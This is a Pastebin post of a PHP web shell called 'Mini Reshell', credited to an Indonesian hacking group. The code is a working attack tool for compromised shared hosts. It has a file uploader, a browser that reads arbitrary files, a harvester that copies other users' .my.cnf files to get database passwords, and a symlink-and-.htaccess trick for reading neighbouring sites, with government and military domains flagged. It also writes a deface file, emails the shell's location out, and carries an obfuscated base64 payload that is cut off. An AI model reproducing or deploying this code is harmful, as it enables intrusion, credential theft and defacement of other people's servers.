Advertisement
ustadcage_48

UstadCage_48 Mini Reshell

May 13th, 2016
1,205
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 44.90 KB | None | 0 0
  1.   <?php
  2.  
  3.   /* Copyright :             */
  4.   /* Recoded By UstadCage_48 */
  5.   /* Sumedang Cyber Team     */
  6.   /* Newbie Galau            */
  7.   /* Gua Sunda Coeg          */
  8.   /* Sinkaroid X Kerupuk     */
  9.   /* Cpanel Author rEd X     */
  10.  
  11. @ini_set('output_buffering',0);
  12. @ini_set('display_errors', 0);
  13.  
  14. $gambar = "http://0x01.yn.lt/1531752236697.png"; //url gambar
  15. $nick = "UstadCage_48"; //nick kamu
  16.  
  17.  
  18.  
  19. ?>
  20.      <html>
  21.      <head>
  22.  
  23.    <? ///////////CSS////////// ?>
  24.      
  25.      <style type="text/css">
  26.  body {
  27.        background:black; font-size:11px;
  28.        font-family:Courier,Courier,Courier;
  29.     color: white;  }
  30.  a {
  31.      color:darkred;
  32.       }
  33.  a:hover {
  34.      border-bottom:1px solid aqua;
  35.       }
  36.  #menu a {
  37.         padding:4px 15px;
  38.         margin:0;
  39.         background:darkred;
  40.         color:white;
  41.         text-decoration:none;
  42.         letter-spacing:2px;
  43.         -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  44.        }
  45.        #menu a:hover {
  46.         padding:4px 15px;
  47.         margin:0;
  48.         background: grey;
  49.         color:white;
  50.         text-decoration:none;
  51.         letter-spacing:2px;
  52.         -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  53.        }
  54.   textarea {
  55.        width:600px;
  56.        height:200px;
  57.        background: black;
  58.        border:1px solid darkred;
  59.        color: darkgreen;
  60.        }
  61.   input[type=text] , input[type=file] , select {  
  62.        background:black;
  63.        color:white;border: 1px solid darkred;
  64.        padding:6px 6px 6px 6px;
  65.         }
  66.   input[type=submit] {
  67.        background:#b70505;
  68.       color:white;border: 1px solid #000;
  69.       padding:6px 6px 6px 6px;
  70.        }
  71.   .subbtn:hover {
  72.        background:#c0bfbf;
  73.        color:#000000;
  74.        }
  75.  
  76. td, th { font-size: 12pt; text-align: left; vertical-align: top; color: dodgerblue; }
  77. h1           { font-size: 16pt; text-align: center; }
  78. h1 a         { color: #000000 !important; text-decoration: none; }
  79. p            { text-align: center; font-size: 9pt; }
  80. p a          { color: #666666 !important; }
  81. table        {  margin: 0 auto; border-collapse: collapse; border: 1px solid #ffffff; min-width: 400px; }
  82. th, td       { padding: 5px 10px; }
  83. th           { background: black; color: #ffffff; }
  84. td a         { color: dodgerblue !important; text-decoration: none; }
  85. th img       { position: relative; top: -3px; left: 2px; }
  86. td           { border-bottom: 1px solid #cccccc; background: black; }
  87. tr.odd td    { background: black; }
  88.  
  89. #lol a {
  90.         padding:4px 15px;
  91.         margin:0;
  92.         background:darkgreen;
  93.         color:white;
  94.         text-decoration:none;
  95.         letter-spacing:2px;
  96.         -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  97.        }
  98. </style>
  99.  
  100.   <?  /////////TITLE////////  ?>
  101.  
  102. <title>
  103. --== <?php echo $nick; ?> Mini Reshell ==--</title>
  104. </head>
  105.  
  106.   <?  ////////MENU///////// ?>
  107.  
  108. <br><center><div id=menu>
  109. <a href=?beby=home>Home</a>
  110. <a href=?beby=config>Grabber</a>
  111. <a href=?beby=cpanel>Cpanel Finder</a>
  112. <a href=?beby=uploads>Uploader</a>
  113. <a href=?beby=domain>Domain</a>
  114. <a href=?beby=tools>Tools</a>
  115.  
  116. </div></center>
  117. <p>
  118. <center>
  119. <img src=<?php echo $gambar; ?> width=320 height=315/><br /></center><br><center><div id=menu>
  120. <a href=?beby=jumper>Jumping</a>
  121. <a href=?beby=reverse>Riverse IP</a>
  122. <a href=?beby=symlink>Symlink</a>
  123. <a href=?beby=info>Info Web</a>
  124. <a href=?beby=quotes>Itachi Quotes</a>
  125.  
  126. </div></center>
  127. <br><center>
  128.  
  129.    <?  ////////START///////// ?>
  130.    
  131. <?php
  132. //uname
  133.  echo '<font color="white">';
  134.  echo php_uname();
  135.  echo '<br><font color="darkred">Path :</font>';
  136.  echo getcwd();
  137.  echo '</font>';
  138. //info web
  139. if(isset($_GET['beby']) && ($_GET['beby'] == 'info')){
  140. ?>
  141.  
  142.  
  143.  
  144. <br><br><font size="2pt" color="green">Get Info Website</font>
  145. <form action="?beby" method="GET">
  146. <input type="text" name="beby" value="beby@Codes#~: info"> <input type="submit" value="Cek >> ">
  147. </form>
  148.  
  149.  
  150.  
  151. <?php
  152.     }
  153. //info codes
  154.     if(isset($_GET['beby']) && ($_GET['beby'] == 'beby@Codes#~: info')){
  155. ?>
  156.  
  157.     <form action="?path=<?php echo $path; ?>&amp;beby=" method="post">
  158.  
  159. <?php
  160.  $verdad = php_uname('s') . php_uname('r');
  161.     $link = "http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=" . $verdad . "&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
  162.  
  163.  
  164. echo '<br><br> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;text-align:center;"> Name </th><th style="background:darkred;color:white; border-left:1px solid white; text-align:center; "> Info </th></tr> ';
  165. ?>
  166.  
  167.   <tr><td>IP</td>
  168.   <td style='border-left:1px solid white;' > <?php echo $_SERVER['SERVER_ADDR']; ?></td></tr>
  169.  
  170.   <tr><td>User</td>
  171.   <td style='border-left:1px solid white;' > uid=<?php echo getmyuid(); ?> gid= <?php echo getmygid(); ?></td></tr>
  172.  
  173.   <tr><td>Path</td>
  174.   <td style='border-left:1px solid white;' > <?php echo getcwd(); ?></td></tr>
  175.  
  176.   <tr><td>PHP Version</td>
  177.   <td style='border-left:1px solid white;' > <?php echo phpversion(); ?> </td></tr>
  178.  
  179.   <tr><td>Server</td>
  180.   <td style='border-left:1px solid white;' ><? echo $_SERVER['SERVER_SOFTWARE']; ?> </td></tr>
  181.  
  182.   <tr><td> System </td>
  183.   <td style='border-left:1px solid white;' > [ <a href=<? echo $link; ?>'><? echo $verdad; ?></a> ] <?php echo php_uname('v'); ?></td></tr>
  184.  
  185.  
  186.  
  187. <?php
  188.  
  189.   echo '<tr><td>';
  190.  echo 'Safe Mode </td><td style="border-left:1px solid white;"> ';
  191.     if (ini_get('safe_mode') == 0) {
  192.         echo "<font color='red'>OFF</font>";
  193.     } else {
  194.         echo " <font color='green'>ON</font> ";
  195.     }
  196.    
  197.     echo '</td></tr>';
  198.     echo '<tr><td style="border-left:1px solid white;">';
  199.    
  200.  echo 'Magic Quotes </td><td style="border-left:1px solid white;"> ';
  201.     if (get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
  202.         echo "<font color='red'>OFF</font>";
  203.     } else {
  204.         echo " <font color='green'>ON</font> ";
  205.     }
  206.     echo '</td></tr></table>';
  207.    
  208. ?>    
  209.    
  210.     <?php
  211.     }
  212. //kosong kak
  213. elseif(isset($_GET['beby']) && ($_GET['beby'] == '')){
  214.     ?>
  215.  
  216.  
  217.  
  218.  
  219.  
  220.  
  221.  
  222. <?php
  223.     }
  224. //home
  225. if(isset($_GET['beby']) && ($_GET['beby'] == 'home')){
  226.     ?>
  227.    
  228.      <?php
  229.    
  230.      echo '<br><br> <table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;text-align:center;"> Nama </th><th style="border-left:1px solid white;text-align:center;background:darkred;color:white;"> Disable </th></tr> ';
  231.         echo '<tr><td>DisablePHP</td><td style="border-left:1px solid white;">';
  232.         $disable_functions = @ini_get("disable_functions");
  233.         echo "<font color='darkred'>";
  234.         echo $disable_functions;
  235.         echo "</font>";
  236.       echo '</td></tr></table>';
  237.     ?>
  238.    
  239.    
  240. <?php
  241.     }
  242. //uploads
  243.      elseif(isset($_GET['beby']) && ($_GET['beby'] == 'uploads'))
  244.     {
  245.         echo"<br><br><form method=post enctype=multipart/form-data>";
  246.         echo"<input type=file name=f><input name=k type=submit id=k value=Upload><br>";
  247.           if($_POST["k"]==Upload)
  248.     {
  249.     if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
  250.     echo"<b>".$_FILES["f"]["name"];
  251.     }else{
  252.     echo"<b>Gagal upload";
  253.     }
  254.     }
  255.     ?>
  256.    
  257. <?php
  258.       }
  259. //cpanel auto crack
  260. elseif(isset($_GET['beby']) && ($_GET['beby'] == 'cpanel')){
  261. @ini_set('display_errors',0);
  262. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  263.     $ar0=explode($marqueurDebutLien, $text);
  264.     $ar1=explode($marqueurFinLien, $ar0[$i]);
  265.     return trim($ar1[0]);
  266. }
  267.  
  268. echo '<br><br>';
  269.  
  270. echo "<center>";
  271. $d0mains = @file('/etc/named.conf');
  272. $domains = scandir("/var/named");
  273.  
  274. if ($domains or $d0mains)
  275. {
  276.     $domains = scandir("/var/named");
  277.     if($domains) {
  278. echo '<table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;"> Count </th><th style="background:darkred;color:white;"> Domain </th><th style="background:darkred;color:white;"> User </th><th style="background:darkred;color:white;"> Password </th><th style="background:darkred;color:white;"> .my.cnf </th></tr>';
  279. $count=1;
  280. $dc = 0;
  281. $list = scandir("/var/named");
  282. foreach($list as $domain){
  283. if(strpos($domain,".db")){
  284. $domain = str_replace('.db','',$domain);
  285. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  286. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  287. $path = getcwd();
  288.  
  289. if (is_readable($dirz)) {
  290. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  291. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  292. $password=entre2v2($p,'password="','"');
  293. echo "<tr><td>".$count++."</td><td style='border-left:1px solid white;'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td style='border-left:1px solid white;'>".$owner['name']."</td><td style=border-left:1px solid white;>".$password."</td><td style='border-left:1px solid white;'><a href='".$owner['name'].".txt' target='_blank'>Check Here</a></td></tr>";
  294. $dc++;
  295. }
  296.  
  297. }
  298. }
  299. echo '</table>';
  300. $total = $dc;
  301. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
  302. echo '</center>';
  303. }else{
  304. $d0mains = @file('/etc/named.conf');
  305.     if($d0mains) {
  306. echo '<table width="700" border="0" cellpadding="3" cellspacing="1" align="center" ><tr><th style="background:darkred;color:white;"> Count </th><th style="background:darkred;color:white;"> Domain </th><th style="background:darkred;color:white;"> User </th><th style="background:darkred;color:white;"> Password </th><th style="background:darkred;color:white;"> .my.cnf </th></tr>';
  307. $count=1;
  308. $dc = 0;
  309. $mck = array();
  310. foreach($d0mains as $d0main){
  311.     if(@eregi('zone',$d0main)){
  312.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
  313.         flush();
  314.         if(strlen(trim($domain[1][0])) >2){
  315.             $mck[] = $domain[1][0];
  316.         }
  317.     }
  318. }
  319. $mck = array_unique($mck);
  320. $usr = array();
  321. $dmn = array();
  322. foreach($mck as $o) {
  323.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  324.     $usr[] = $infos['name'];
  325.     $dmn[] = $o;
  326. }
  327. array_multisort($usr,$dmn);
  328. $dt = file('/etc/passwd');
  329. $passwd = array();
  330. foreach($dt as $d) {
  331.     $r = explode(':',$d);
  332.     if(strpos($r[5],'home')) {
  333.         $passwd[$r[0]] = $r[5];
  334.     }
  335. }
  336. $l=0;
  337. $j=1;
  338. foreach($usr as $r) {
  339. $dirz = '/home/'.$r.'/.my.cnf';
  340. $path = getcwd();
  341. if (is_readable($dirz)) {
  342. copy($dirz, ''.$path.'/'.$r.'.txt');
  343. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  344. $password=entre2v2($p,'password="','"');
  345. echo "<tr><td>".$count++."</td><td style='border-left:1px solid white;'><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td style=border-left:1px solid white;>'.$r."</td><td style=border-left:1px solid white;>".$password."</td><td style=border-left:1px solid white;><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  346. $dc++;
  347.                 flush();
  348.                 $l=$l?0:1;
  349.                 $j++;
  350.                                 }
  351.             }
  352.                         }
  353. echo '</table>';
  354. $total = $dc;
  355. echo '<br><font color="green">Total cPanel Found = '.$total.'</font>';
  356. echo '</center>';
  357.  
  358. }
  359. }else{
  360. echo "<i><font color='green'>ERROR<br>/var/named or etc/named.conf Not Accessible! </font> </i>";
  361. }
  362. ?>
  363.  
  364. <?php
  365.     }
  366. //jumping
  367.     elseif(isset($_GET['beby']) && ($_GET['beby'] == 'jumper')){
  368.         echo '<center>';
  369.      ($sm = ini_get('safe_mode') == 0) ? $sm = 'off': die('<br><b><font color="green">Error: safe_mode = on</font></b>  </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By $nick</font></center><b>
  370.         <br><center>$nick Mini Reshell</center> ');
  371.     set_time_limit(0);
  372.     ###################
  373.     @$passwd = fopen('/etc/passwd','r');
  374.     if (!$passwd) { die('<br><b><font color="green">Error : coudn`t read /etc/passwd</font></b>     </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By '.$nick.'</font></center><b>
  375.         <br><center>'.$nick.' Mini Reshell</center> '); }
  376.     $pub = array();
  377.     $users = array();
  378.     $conf = array();
  379.     $i = 0;
  380.     while(!feof($passwd))
  381.     {
  382.         $str = fgets($passwd);
  383.         if ($i > 35)
  384.             {
  385.             $pos = strpos($str,':');
  386.             $username = substr($str,0,$pos);
  387.             $dirz = '/home/'.$username.'/public_html/';
  388.             if (($username != ''))
  389.                 {
  390.                 if (is_readable($dirz))
  391.                     {
  392.                     array_push($users,$username);
  393.                     array_push($pub,$dirz);
  394.                     }
  395.                 }
  396.             }
  397.         $i++;
  398.     }
  399.    
  400.     ###################
  401.     echo '<br>';
  402.     echo "[+] Founded <font size=10 color=red> ".sizeof($users)." </font> entrys in /etc/passwd\n"."<br />";
  403.     echo "[+] Founded <font color=red size=10> ".sizeof($pub)." </font> readable public_html directories\n"."<br />";
  404.     echo "[~] Searching for passwords in config files...\n\n"."<br /><br /><br />";
  405.     foreach ($users as $user)
  406.         {
  407.         $path = "/home/$user/public_html/";
  408.         echo " <table><tr><td> ";
  409.         echo "<font color=white>[Ok] <a href='?beby=exploler&path=$path'>$path</a></font><br>";
  410.         echo " </td></tr></table> ";
  411.         }
  412.     echo "\n";
  413.     echo '</center>';
  414. ?>
  415.  
  416. <?php
  417.     }
  418. //get files jump
  419.   elseif(isset($_GET['filesrc'])){
  420. echo "<br><br>Current File : ";
  421. echo $_GET['filesrc'];
  422. echo '<br /><br><table width="700" border="0" cellpadding="3" cellspacing="1" align="center" width="100%"><tr><td style="background:darkred;color:white;"><b>Code &lt;/&gt;</b></td></tr><tr><td width="700" border="0" cellpadding="3" cellspacing="1" align="center" width="100%" >';
  423.  
  424. ?>
  425.  
  426. <?php
  427. echo ' <font color="green"> ';
  428. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
  429. echo ' </font> ';
  430. ?>
  431.  
  432. <?php
  433.  
  434. echo '</td></tr></table>';
  435. }
  436. //open directory
  437.   elseif(isset($_GET['beby']) && ($_GET['beby'] == 'exploler')){
  438.          if(isset($_GET['path'])){
  439. $path = $_GET['path'];
  440. }else{
  441. $path = getcwd();
  442. }
  443. $path = str_replace('\\','/',$path);
  444. $paths = explode('/',$path);
  445. echo ' <br><br> <div id="lol"> <font color="darkred"> Current Path : </font><font color="green"> ';
  446. foreach($paths as $id=>$pat){
  447. if($pat == '' && $id == 0){
  448. $a = true;
  449. echo '<a href="?beby=exploler&path=/">Root</a>&nbsp;';
  450. continue;
  451. }
  452. if($pat == '') continue;
  453. echo '<a href="?beby=exploler&path=';
  454. for($i=0;$i<=$id;$i++){
  455. echo "$paths[$i]";
  456. if($i != $id) echo "/";
  457. }
  458. echo '">'.$pat.'</a>&nbsp;';
  459. }
  460. echo ' </font></div> ';
  461.  
  462. $path = getcwd();
  463. if(isset($_GET['path'])){
  464. $path = $_GET['path'];
  465. }else{
  466. $path = getcwd();
  467. }
  468. //scan directory
  469.   $scandir = scandir($path);
  470. echo '<br><br><center><table class="bawah"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  471. <tr>
  472. <td style="background:darkred;color:white;"><center>Name</center></td>
  473. <td style="background:darkred;color:white; border-left:1px solid white;"><center>Permissions</center></td>
  474. </tr>';
  475. //for scan directory
  476. foreach($scandir as $dir){
  477. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  478. echo "<tr>
  479. <td> [DIR] <font color=\"dodgerblue\"> <a href=\"?beby=exploler&path=$path/$dir\">$dir</a></font></td>
  480. <td style='border-left:1px solid white;'><center>";
  481. if(is_writable("$path/$dir")) echo '<font color="green">';
  482. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  483. echo perms("$path/$dir");
  484. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  485.  
  486. echo "</center></td>
  487. </tr>";
  488. }
  489. echo '<br>';
  490. //for scan filelist
  491. foreach($scandir as $file){
  492. if(!is_file("$path/$file")) continue;
  493. $size = filesize("$path/$file")/1024;
  494. $size = round($size,3);
  495. if($size >= 1024){
  496. $size = round($size/1024,2).' MB';
  497. }else{
  498. $size = $size.' KB';
  499. }
  500. //mempersingkat nama file
  501. if (strlen($file) > 40) {
  502.                         $url = substr($file, 0, 35) . "...";
  503.                     } else {
  504.                         $url = $file;
  505.                     }
  506. //starting
  507. echo "<tr>
  508. <td> ★ <font color='dodgerblue'><a href=\"?beby=exploler&filesrc=$path/$file&path=$path\">$url</a></font></td><center><td style='border-left:1px solid white;'><center>";
  509. if(is_writable("$path/$file")) echo '<font color="#FF00FF">';
  510. elseif(!is_readable("$path/$file")) echo '<font color="FFE4E1">';
  511. echo perms("$path/$file");
  512. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  513. echo "</center></td></tr>";
  514.  
  515. }
  516. echo '</table>
  517. </center>';
  518. ?>
  519.  
  520. <?php
  521.     }
  522. //empety tools
  523.    elseif(isset($_GET['beby']) && ($_GET['beby'] == 'empety')){
  524. ?>
  525.  
  526.  
  527.  
  528. :(
  529.  
  530.  
  531.  
  532. <?php
  533.     }
  534. //symlink
  535.      elseif(isset($_GET['beby']) && ($_GET['beby'] == 'symlink')) {  
  536.      echo " <form action= method=post>";
  537.  @set_time_limit(0);
  538.  echo "<center>";
  539.  @mkdir('sym',0777);
  540. $htaccess = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $write =@fopen ('sym/.htaccess','w'); fwrite($write ,$htaccess); @symlink('/','sym/root'); $filelocation = basename(__FILE__); $read_named_conf = @file('/etc/named.conf'); if(!$read_named_conf) { echo "<br><br><font color='green'>Cant access this file on server -> [ /etc/named.conf ]</font></center>"; } else { echo "<table width='700' border='0' cellpadding='3' cellspacing='1' align='center'><td style='background:darkred;color:white;'>Domains</td><td style='background:darkred;color:white;'>Users</td><td style='background:darkred;color:white;'>Symlink </td>"; foreach($read_named_conf as $subject){ if(eregi('zone',$subject)){ preg_match_all('#zone "(.*)"#',$subject,$string); flush(); if(strlen(trim($string[1][0])) >2){ $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0])); $name = $UID['name'] ; @symlink('/','sym/root'); $name = $string[1][0]; $iran = '\.ir'; $israel = '\.il'; $indo = '\.id'; $sg12 = '\.sg'; $edu = '\.edu'; $gov = '\.gov'; $gose = '\.go'; $gober = '\.gob'; $mil1 = '\.mil'; $mil2 = '\.mi'; if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0]) or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0])) { $name = "<font color=red>".$string[1][0].'</font>'; } echo " <tr> <td><a target=_blank href=http://www.".$string[1][0].'/>'.$name.' </a>  </td> <td style=border-left:1px solid white;> '.$UID['name']." </td> <td style=border-left:1px solid white;> <a href=sym/root/home/".$UID['name']."/public_html target=_blank>Symlink </a> </td> </tr>"; flush(); } } } } echo "</center></table>";
  541. }
  542. ?>
  543.  
  544. <?php
  545. //reverse IP lookup
  546.   if(isset($_GET['beby']) && ($_GET['beby'] == 'reverse'))
  547. {
  548. ?>
  549. <br><br><br>
  550. <center><div id="sitelist"><a onClick="window.open('http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER ['SERVER_ADDR']; ?>','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.viewdns.info/reverseip/?host=<?php echo $_SERVER ['SERVER_ADDR']; ?>"><div id='menu'> DNS Reverse IP </a></center>
  551. <br><br>
  552. <center><div id="sitelist"><a onClick="window.open('http://www.bing.com/search?q=ip%3A<?php echo $_SERVER ['SERVER_ADDR']; ?>+paypal','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.bing.com/search?q=ip%3A<?php echo $_SERVER ['SERVER_ADDR']; ?>+paypal"><div id='menu'> Paypal On Server </a></center>
  553. <br><br>
  554. <center><div id="visa"><a onClick="window.open('http://www.bing.com/search?q=ip%3A<?php echo $_SERVER ['SERVER_ADDR']; ?>+visa+master','POPUP','width=900 0,height=500,scrollbars=10');return false;" href="http://www.bing.com/search?q=ip%3A<?php echo $_SERVER ['SERVER_ADDR']; ?>+visa+master"><div id='menu'> CC On Server </a></center>
  555.  
  556.  <?php
  557.  }
  558. //tools for you
  559.     if(isset($_GET['beby']) && ($_GET['beby'] == 'tools'))
  560. {
  561.    echo'<center><br><br>
  562. <tr><form method="post" action="">&nbsp;<td>
  563. <select name="pilihan" id="pilih">
  564. <option>-----------------=Select=-----------------</option>
  565. <option value="db">DataBase [Mysql Adminer]</option>
  566. <option value="forbid">Bypass Forbidden Symlink/Config [ .htaccess ]</option>
  567. <option value="auto">Deface! [bie.txt]</option>
  568. </select>
  569. <input  type="submit" name="submites" value=" >> ">
  570. </td></form>';
  571. //starting
  572. error_reporting(0);
  573. set_time_limit(0);
  574. $submit = $_POST ['submites'];
  575. if(isset($submit)) {
  576.     $pilih = $_POST['pilihan'];
  577. //auto deface      
  578.     if ( $pilih == 'auto') {
  579.         $file = 'Hacked By '.$nick.'';
  580.         $r=fopen("bie.txt", "w"); fwrite($r,$file); fclose($r);
  581.             $to = "$email";
  582. $subject = "bie.txt";
  583. $header = "Script Deface";
  584. $message = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . "\r\n";
  585. $message .= "Pass : ".$auth_pass." Path : " . __file__;
  586. $sentmail = @mail($to, $subject, $message, $header);
  587.         echo "<script>alert('done! check bie.txt'); hideAll();</script>";
  588.         echo "<p><center><font color=green>Check = >> <a href='bie.txt' target=_blank><b>bie.txt</b></a></font></center>
  589.      
  590.      
  591.      
  592.         </div><br><br><center><b><font color=red>&copy 2015 - 2016 Recoded By $nick</font></center><b>
  593.         <br><center>$nick Mini Reshell</center>
  594.          ";
  595.         die();
  596.         }
  597. //for database mysql manager
  598.         elseif ( $pilih == 'db') {
  599.         $script = "PD9waHAgZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZU5yTlBXdFhHN21TbjJmT21mK2c5UGltN2NFWW16eXZqWjJRUUdZNFE0QUw1TjZkeFY1djIyNURMM2EzMDkwT01CbisrOVpEcjM2WVFKTGRjK2NCTGFsVUpaV2tVbFdwSkg3NjBZL2pLQjdHL2lLSzB5QThyNzZvZFg3NjhYWGlwOE81ZHg2TWh4K1hVZW9udzNnWnBzSGNyemF4T0JvTms5U0wweW9tS25Nc0VGM2hYeTltMGNTdnVzS3RpM2t3amlPcVVTTWdncGVBWE9Pc05SQnI2cnM1QUtDSlB3MUNxSCt5UFR3K1BEd0ZMRWxLVFp0NVk4anU5eUhIM1lBZmt5QU9QVUE5SEw3YjI5OGREbXUxQnVRam5ZME5oV1R2WlBpdnZRUEdBZjlWajM0N0doNmVBQUxNcllsWG9pWGFvaWxxRmwxZFpXZnZlUGZ0NmVIeEg4T1QzYVB0NDIzNEZOMnV3QmJrNE44ZXZnZjQ4Y3hMa3FGL0hTUnBVblV4YnlXQlg0L2VRb1h6UEh2UEYyUEpxRW1RREtmTGNBeDhRcWp4OUh6NHlZdXJMdVI3bzVsUFpXa1FoVW0rS2REQnZZTjNoNEM5K3NpUC9mT2c2aXd1RmtFNGpaeTZ4bHJMTm96R0dRZGdPQXZtUWNxais5T1AweWoydmZGRjFZdGo3NmJxRG4vZGhjRndoMGVISjZmUU15OFJGUmlWajBzL1NXdmlzd0d2Nkd5R3VmUnZSTGNISDUrODJkSW4wR0FxcWxUd3VYa3JIZ0ZMaDY3T1orNVFVbFlCSGlSRGJvUkNBdTI3aFhLSlhPSG1YUDVQRWhsZmVESDBqc1p0bVU1Zk1wMEwzNXY0Y2RVWlIySHFoK242NmMzQ2I0dlV2MDQzTHRMNXJDTmt0UzVVV1gvcEVEbmh6eEsvZ0hNVW5EOTdJRTZzY2hmSzg5SGxBekZDamJzUXpqeFkwcTBINGd5U2FQM2x5MmQvWDk5MEpMZHgrZnF6S2JIN1pQZjRuN3ZIWnk0dXA1UGQvWGZ1QUNaVWFYYmJ5ajU1ZTd4M2REbzgySDYvNitKS3IrQ2NBNUV3WHdCU2xoSTA4ZVRZVFNLUVJNeGxiM3k1WE14dmtvOHpWengrTEI1VkV1K1Q3eVhUWU1ZVGFqS0NEb1ZRWlhRUkpXbGR3TWN5OFdQNldNQ3FwQThVRnZBaGU4aGxJTzVvdmFXNHFxQVZOTTJHMDFtd3FISWVsY1orc3B3Qk04WEhxblB5MitHL0JCVWx4QmxzNmlNSlVST0xxcnQxc2Rsekc5VFlJWW5WS3NpbHJRM01KV1RZYUd3S29CdDVDWDFXRFk5K096MDlHdjZHUzJ6UWNJZnZiMDcrc2QvQWJtTlZPWGp1V3psNEtRMmV0MWpNZ3JHSDBtQmpHVjZHMFZWWUNyMFRKSXNvQ1JBT0txVXByTlU1NUhlRWFsRFhiZWpHc1VqSFBreTgxSU9tdWk3a1hGMUFNYzZ1SmZUckNuSzVsMU0vSFYrb0ZTbzVvZGR6a0FDekpUUFBaRTBROUFPR3NHZzBZSm5ENTNLK0lOaXFnYTNwaGMzMHhyTW80YmtDd2paVnN4UEp5VW5UN2JxTWwzanhXUTBTVHdHbUN5TXpUODZ4WTBjem1FbStDTUxGTWhVTTR1ckY5RDBtRnhGSHhxcTlRWFo2UnRNMzM1elRDNTlHUk54RVMzSGxoYW5ZZ1Y3TUltOUNVL1FLWkdvWWhZUUpSaS9iMHN4RWhjWHFqMU9CTlllSXNPcmFkR0dLeU9sclppOWdnSG83eDRkSDRuVDd6ZjZ1MkhzbmR2OWo3K1QwUktUenhkQUx6LzBaMXdLd3Q4ZTcyNmU3RWxBWGk2cVVMR0wvOE9EWE4vdUhiOFRCNGFrNCtMQy9YOU5WOXcrM2Q4VE85dWsyQUwzZDNoZXdZY0VHTGx5bjRVMG1DZXlpRjM2T1NRM0hCYWpUd3dLNWQzdTcrenNuNG5UMytQM2VBYlJuUjd6NUE3WVRMaDErTmhMbWR1aEgwK0hRRmJzbmI3ZVBKSndyOXZjT2RoOVNuZnRReG1mVjcya2N6VTBEVlpjdHBtYkxjQnZqdGZSNjlXSXlZaWE2eXMrWGZSaGZuakJURDM1T1JFNzJaQ2NJQXFJeUFEVVhYbnFCbjFsTzMwdk1YSzlMVVlIMXoxellQZnd3Z1FKMzhFMkNoN0Vwb1poQjVteVB4LzRpWGQvM3cvUDBvaTJjQm1oelVMdGFrU0tDcE1INEloSXl3eElPZ3Y3OTZjZFhQUlFTVzdqUDlmQTNZTWJmY3grRXowV2FMdFpCYXdrK2RaMjMxdDdvcUhIdE9pczJYa1NSQnVuTTc3My9BNFQxMWdZbklEZEpiMkJVa0h1eThqaEpFSHdVVFc3cTZlVHpGREMzUld0emNTMjI0OENiMVUrOWkyanVkV2FneTYxZitNSDVCUlkvWDF4M29QRU5razljcDFnRk44anpPRnFHay9iUDArbTBNNHBpNEJyVUJzQWttZ1VUOGZQejU4ODdDMWhmSUI3YlVMOGpDV3h1U3Z3ZWFHOFdlaGk5WlJ6NHNUandyMENaZkIrRlViSUFCZnhyU0NINlVTbytNK2o2T0pwRmNmdm5VUlAvemVCN01zRi9PeEpnU3Y5MFZuUTUxMzVQZk9acTR1ZG1jOXBCZnE5UC9IRVUwNHh0QTNvL1JzWVNiUHNpK3VUSHVzSzAyU3hVUUJuTGZKbWxMUUdqSlJ1ZlJvdTIxVlhEZ2ZWUmxLYlIzQzZjVENaWmRyWHdYODJhWndEWmFzS1BaL3kvSXJmNXZjajlIZis5bTl3MEdpK1Q3MFVQL3ZHOHUrbmhvdnRPNVB5LzQ3K3J5ZUc4V2IvaVdUS0taaE9idm9DNUhINjJJY0lvbm5zemhBRTdadjU1N3NYblFkaHVhdlJOTExyWUxDdFFNL0VwRUxYWExtVVFqU1Q0MDIrM01DbW45ck0zejE4K2Y0Y29sN01HeWVOWllGQkxvS2RQbnhieDJkOVkvWE4rNHBKMm9GQzhlUEdpTXdVTklHM1AvR25hQWZzUHJPaWI5bWdXalM4N1Y4RUVSR25y